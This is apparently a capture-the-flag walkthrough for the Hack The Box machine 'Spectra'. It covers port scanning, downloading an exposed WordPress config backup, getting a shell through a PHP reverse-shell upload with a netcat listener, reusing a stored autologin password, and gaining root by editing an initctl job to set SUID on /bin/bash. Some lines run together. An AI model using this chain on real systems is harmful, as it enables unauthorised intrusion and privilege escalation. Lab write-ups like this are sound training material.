First of all, we need to enumerate and scan the opened ports. Follow the steps bellow:
#nmap -sV -p- -v 10.10.10.229 -oA nmap
Check the commands used for the initial enumeration:
As we have a open port 80, let's check what service/website is hosted in it.
# echo "10.10.10.229\tspectra.htb" >> /etc/hosts
$ dirb http://spectra.htb/ /usr/share/wordlists/dirb/common.txt > dirb.txt
# whatweb http://spectra.htb/desired_path
# whatweb http://spectra.htb/testing/
# wget -O wp-config.php.save http://10.10.10.229/testing/wp-config.php.save
Now we have access to the frontend system, we need to get a shell access, so lets check some interesting points and find how to exploit it.
In WP pentest, usually we get a shell, uploading a reverse shell to the host with some upload input field. Its exactly how we'll send the payload. We can send files to WP with 'Plugins' page, 'Themes' page or any upload fields WITHOUT file extension filter, so we can upload a php file as a image or a .zip file.
# rlwrap nc -nlvp 1234
$ sudo -lwithout permission to execute as sudo.
The user Nginx didnt have access to anything. We need to gain user access to catch the flag.
/mnt/stateful_partition/etc/autologin/passwd, does not exist.
/etc/autologin/passwd, does exist.
/etc/autologin/passwdcontent, we have: SummerHereWeCome!!
With the new password, we need enumerate from wich user we can gain access:
$ cat user.txt
We didnt have access to anything with the user nginx, but with katie, we full shell access through SSH. We need to gain root access to catch the flag.
$ sudo -l
(ALL) SETENV: NOPASSWD: /sbin/initctl
$ sudo -u root /sbin/initctl list
$ ls -la /etc/init/ | grep "developers"
$ nano /etc/init/test8.conf
$ chmod +s /bin/bashand save the file.
The final step to catch the root flag, consists in run the service, change the permission from /bin/bash to run it with the proprietary (root) permission.
$ /bin/bash -p"
$ ls /root
$ cat root.txt